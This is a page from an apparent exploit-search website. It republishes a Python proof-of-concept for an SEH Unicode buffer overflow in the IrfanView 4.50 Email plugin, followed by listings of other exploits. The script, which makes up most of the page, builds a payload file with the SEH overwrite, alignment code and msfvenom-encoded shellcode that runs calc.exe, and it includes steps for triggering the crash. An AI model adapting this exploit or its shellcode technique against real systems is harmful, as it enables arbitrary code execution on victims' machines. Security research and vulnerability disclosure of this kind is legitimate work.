Search for hundreds of thousands of exploits

"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)"

Author

Exploit author

bzyo

Platform

Exploit platform

windows

Release date

Exploit published date

2018-03-02

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.50 Email PlugIn - Local Buffer Overflow (SEH Unicode)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.50 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.50
# Software Link: http://www.irfanview.info/files/irfanview_450.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_450.zip
# Tested Windows 7 SP1 x86
#
# More reliable result if .NET and updates installed prior to application being installed
# 
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
#   ****if calc doesn't pop on first try, repeat steps 2-4 until it does :/
#

filename="irfan.txt"

#junk to offset
junk = "\x41"*262

#popad
nseh = "\x61\x62"

#0x00500102 pop esi pop ebx  ret  
#unicode possible ansi transform(s) : 0050008A->00500106,ascii {PAGE_EXECUTE_READ} [i_view32.exe] 
seh = "\x8a\x50"

valign = (
"\x55" 			#push ebp
"\x47" 			#align
"\x58" 			#pop eax
"\x47" 			#align
"\x05\x14\x11" 	#add eax,400
"\x47"			#align
"\x2d\x13\x11"	#sub eax,300
"\x47"			#align
"\x50"			#push eax
"\x47"			#align
"\xc3"			#retn
)

#nops to shellcode
nops = "\x71" * 109

#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
calc = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHE2KPKPM0C0U9IU01I02D4K0P004"
"K0RLLTK0RLT4KT2NHLOH7OZO601KOVLOLQQSLLBNLMPWQHOLMM197K2KBQB0WTK0RN0DKPJOLDK0LLQR"
"XIS18M1J121TK1IMPKQYC4KPILXJCOJQ9TKOD4KKQ8VP1KOFL91XOLMM1WWP8IPD5ZVLCCMKHOKSMO42"
"UK428DKPXNDM1ICBFTKLLPKDKB8MLM19CDKLD4KKQHP3YQ4O4MTQKQK1Q291JPQKOIP1OQOPZ4KLRJK4M"
"1MRJM14MU5WBM0M0M0R0QX014K2OTGKO9EGKL06UFBB6C85VF5GM5MKOJ5OLKVSLKZE0KKIPBUM57KQ7M"
"CSB2ORJM0PSKOIEBCC1BL1SNN2E2XC5M0AA"
)

#necessary fill
fill = "\x71"*1000

buffer = junk + nseh + seh + valign + nops + calc + fill

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
Release DateTitleTypePlatformAuthor
2020-07-09"FrootVPN 4.8 - 'frootvpn' Unquoted Service Path"localwindowsv3n0m
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-26"KiteService 1.2020.618.0 - Unquoted Service Path"localwindows"Marcos Antonio LeΓ³n"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
2020-06-23"Code Blocks 20.03 - Denial Of Service (PoC)"doswindows"Paras Bhatia"
2020-06-23"Lansweeper 7.2 - Incorrect Access Control"localwindows"Amel BOUZIANE-LEBLOND"
2020-06-22"Frigate 2.02 - Denial Of Service (PoC)"doswindows"Paras Bhatia"
2020-06-17"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-16"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path"localwindowsboku
Release DateTitleTypePlatformAuthor
2020-04-20"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)"localwindowsbzyo
2019-05-17"Iperius Backup 6.1.0 - Privilege Escalation"localwindowsbzyo
2019-05-06"NSClient++ 0.5.2.35 - Privilege Escalation"localwindowsbzyo
2019-02-14"exacqVision ESM 5.12.2 - Privilege Escalation"localwindowsbzyo
2019-01-30"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-28"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-11"Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)"localwindowsbzyo
2019-01-10"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2018-12-27"Iperius Backup 5.8.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-20"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)"localwindowsbzyo
2018-12-20"LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)"localwindows_x86bzyo
2018-12-11"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion"webappsmultiplebzyo
2018-09-12"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)"webappswindowsbzyo
2018-09-12"SynaMan 4.0 build 1488 - SMTP Credential Disclosure"webappswindowsbzyo
2018-08-06"AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Privilege Escalation"localwindowsbzyo
2018-05-06"HWiNFO 5.82-3410 - Denial of Service"doswindowsbzyo
2018-04-24"RGui 3.4.4 - Local Buffer Overflow"localwindowsbzyo
2018-04-18"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities"webappsxmlbzyo
2018-04-17"Reaper 5.78 - Local Buffer Overflow"localwindowsbzyo
2018-04-09"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)"localwindowsbzyo
2018-04-02"WebLog Expert Enterprise 9.4 - Privilege Escalation"localwindowsbzyo
2018-03-26"LabF nfsAxe 3.7 - Privilege Escalation"localwindowsbzyo
2018-03-23"WM Recorder 16.8.1 - Denial of Service"doswindowsbzyo
2018-03-05"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow"localwindowsbzyo
2018-03-02"IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)"localwindowsbzyo
2018-03-02"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)"localwindowsbzyo
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/44218/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.